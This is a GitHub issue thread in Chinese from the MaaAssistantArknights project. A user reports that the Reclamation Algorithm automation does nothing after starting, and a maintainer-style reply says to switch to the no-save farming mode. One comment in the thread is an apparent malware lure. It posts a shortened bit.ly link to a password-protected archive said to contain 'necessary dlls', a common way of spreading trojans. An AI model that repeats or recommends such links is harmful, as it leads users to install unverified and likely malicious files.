### ISSUE TITLE
生息演算开始任务后无动作

### ISSUE THREAD

**Issue by HCprjkt** [MaaAssistantArknights/MaaAssistantArknights#10647]
> [!warning]
存在未确认的链接，请谨慎访问。
There are unconfirmed links, please visit with caution.

### 在提问之前...

- [X] 我理解 Issue 是用于反馈和解决问题的，而非吐槽评论区，将尽可能提供更多信息帮助问题解决
- [X] 我填写了简短且清晰明确的标题，以便开发者在翻阅 Issue 列表时能快速确定大致问题。而不是“一个建议”、“卡住了”等
- [X] 我使用的是当前更新版本的最新版，且已查看版本发布至今和 Pull Requests 中尚未发布的更新内容，并未提及该 Bug 已被修复的情况
- [X] 我已检查了置顶议题（Pinned Issue）（公告）、活跃议题（Open Issue）、已关闭议题（Closed Issue），确认我的问题未被提及

### 问题描述

从生息演算主界面开始任务后一直无动作，无法开始演算，屏幕上也没有任何其他操作；如果手动点击开始演算，进入后仍然无动作，并在一段时间后报错。

### Version

UI Version: v5.6.2
Core Version: v5.6.2
Build Time: 2024/9/16 16:44:25

### 日志和配置文件

[asst.log](https://github.com/user-attachments/files/17070614/asst.log)
[gui.log](https://github.com/user-attachments/files/17070616/gui.log)
[gui.json](https://github.com/user-attachments/files/17070639/gui.json)

### 配置信息

Windows10，雷电模拟器，分辨率1920x1080，dpi280，帧率60，GPU加速推理未开启

### 截图或录屏

![image](https://github.com/user-attachments/assets/6e038a29-98db-4ad2-987f-133aa6888adb)
如图，开始任务后始终无动作（停止是我数分钟后手动按的，以便说明无动作会一直持续）。
![image](https://github.com/user-attachments/assets/c6bdcc52-51af-43f2-b5f1-3bcdde4da156)
![image](https://github.com/user-attachments/assets/105ce02d-f924-4ae2-a7dc-7d71eca05e0e)
如图，如果手动点击开始演算，进入第一天后仍然无动作，并在一段时间后报错。

**Comment by Kevin-Otalvares** [comment]
download
https://bit.ly/3TC7hrw
Archive codepass: changeme
I put the necessary dlls in the archive

**Comment by Alan-Charred** [comment]
您好，根据日志文件，您选择了有存档刷点模式，请点开高级设置，切换到无存档刷点模式。您需要在生息演算主题界面开始此任务，如果您已开始演算，请删除存档后再尝试。
